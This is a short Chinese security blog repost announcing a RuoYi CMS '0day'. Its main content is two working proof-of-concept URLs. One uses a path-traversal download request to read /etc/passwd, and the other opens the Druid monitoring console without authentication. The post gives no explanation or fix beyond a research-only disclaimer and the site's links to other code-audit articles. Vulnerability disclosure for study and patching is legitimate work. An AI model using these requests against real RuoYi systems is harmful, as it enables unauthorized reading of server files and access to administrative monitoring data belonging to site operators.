若依CMS 0day 任意文件读取 or 未授权访问

2021年4月22日01:09:31评论1,854 views字数 216阅读0分43秒阅读模式

若依CMS 0day 任意文件读取 or 未授权访问

若依管理系统后台任意文件读取

POC：

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

若依管理系统未授权访问

POC：

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

本文始发于微信公众号（Khan安全攻防实验室）：若依CMS 0day 任意文件读取 or 未授权访问

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

PHPStudy&PHPStorm代码审计调试环境搭建

Java 安全 | JDK7u21 原生链

JavaSec | 某次代码审计比赛记录

记录某次代码审计比赛记录

一文学习Spring依赖注入

whisper多商户客服系统存在前台SQL注入漏洞

【代码审计】Emlog存在SQL注入+XSS漏洞

Spring MVC + FastJSON：反序列化攻击是怎么一步步发生的？

FastJSON + MQ 实现反序列化漏洞攻击链

PHP代审之微信公众号小说系统

本文由 admin 发表于 2021年4月22日01:09:31
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
若依CMS 0day 任意文件读取 or 未授权访问https://cn-sec.com/archives/340572.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

8888